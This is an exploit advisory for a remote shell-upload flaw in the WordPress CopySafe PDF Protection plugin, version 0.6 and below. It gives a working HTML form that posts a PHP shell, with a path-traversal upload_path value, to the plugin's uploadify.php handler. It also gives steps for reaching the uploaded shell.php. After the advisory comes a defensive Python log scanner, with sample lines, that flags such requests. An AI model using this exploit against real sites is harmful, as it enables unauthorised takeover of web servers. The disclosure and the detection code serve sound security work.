
WordPress CopySafe PDF Protection 0.6 Shell Upload

Posted Jul 14, 2014
Authored by Jagriti Sahu

WordPress CopySafe PDF Protection plugin versions 0.6 and below suffer from a remote shell upload vulnerability.

tags | exploit, remote, shell
MD5 | 2bb66ce6b558daa1b35ac1b6c6e5058f

##################################################################################################
#Exploit Title : WordPress Plugin CopySafe PDF Protection Shell Upload vulnerability
#Author : Jagriti Sahu
#Download Link : http://wordpress.org/support/plugin/wp-copysafe-pdf
#version affected : 0.6 and below
#Date : 14/07/2014
#Discovered at : IndiShell Lab
#Love to : Surbhi, Mradula and Harry
##################################################################################################

////////////////////////
/// Overview:
////////////////////////
The WordPress plugin CopySafe PDF Protection (up to version 0.6) suffers
from an unrestricted file upload vulnerability which allows an attacker to
upload a malicious PHP shell to the server.
To avoid exploitation, update the plugin to version 0.7.

///////////////////////////////
// Vulnerability Description:
///////////////////////////////
The vulnerability is due to the lib/uploadify/uploadify.php file, in which
there is no check during file upload.
An attacker needs to forward a file upload request to this file with a PHP
shell and a file upload path.


///////////////////////
/// exploit code ////
///////////////////////


<form
action="http://website.com/wp-content/plugins/wp-copysafe-pdf/lib/uploadify/uploadify.php"
method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="wpcsp_file" ><br>
<input type=text name="upload_path" value="../../../../uploads/">
<input type="submit" name="submit" value="Submit">
</form>

Save this code on your machine as exploit.html.
Open exploit.html in a web browser, browse to your PHP shell and click the
submit button.

The shell will be uploaded to the uploads directory:
http://website.com/wp-content/uploads/shell.php
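
A log check for the request pattern described above, as an added example that is not part of the original advisory: it flags successful POSTs to the uploader path and successful requests for script files under /wp-content/uploads/. The Combined Log Format, the function name scan, the extension list and the sample lines are assumptions constructed for illustration.

```python
import posixpath
import re
from urllib.parse import unquote

# Upload handler path named in the advisory.
UPLOADER = "/wp-content/plugins/wp-copysafe-pdf/lib/uploadify/uploadify.php"
# Script-type files requested from the uploads tree (extension list is an assumption).
UPLOADED_SCRIPT = re.compile(r"^/wp-content/uploads/.*\.(php\d?|phtml|phar)$", re.I)
# Assumed Combined Log Format: ip ident user [time] "METHOD target PROTO" status ...
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')


def scan(lines):
    """Return (kind, client_ip, timestamp, path) for each suspicious request."""
    findings = []
    posted = set()  # clients seen POSTing to the upload handler
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # ignore lines that are not in the expected format
        ip, ts, method, target, status = m.groups()
        if not status.startswith("2"):
            continue  # only requests the server actually fulfilled
        # Drop the query string, then decode and normalise the path so that
        # %2e, // and /./ variants compare equal.
        path = posixpath.normpath(unquote(target.split("?", 1)[0]))
        if method == "POST" and path.lower() == UPLOADER:
            posted.add(ip)
            findings.append(("upload_handler_post", ip, ts, path))
        elif UPLOADED_SCRIPT.match(path):
            kind = "script_after_upload_post" if ip in posted else "script_in_uploads"
            findings.append((kind, ip, ts, path))
    return findings


# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [14/Jul/2014:10:02:11 +0000] "POST /wp-content/plugins/'
    'wp-copysafe-pdf/lib/uploadify/uploadify.php HTTP/1.1" 200 12 "-" "-"',
    '198.51.100.7 - - [14/Jul/2014:10:02:40 +0000] '
    '"GET /wp-content/uploads/shell.php HTTP/1.1" 200 431 "-" "-"',
    '203.0.113.20 - - [14/Jul/2014:10:03:02 +0000] '
    '"GET /wp-content/uploads/2014/07/report.pdf HTTP/1.1" 200 88211 "-" "-"',
    '203.0.113.20 - - [14/Jul/2014:10:04:15 +0000] '
    '"GET /wp-content/uploads/x.php HTTP/1.1" 404 210 "-" "-"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

On a site that has been updated to 0.7, a hit of either kind in older logs is still worth following up, since files written before the update remain in the uploads directory.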
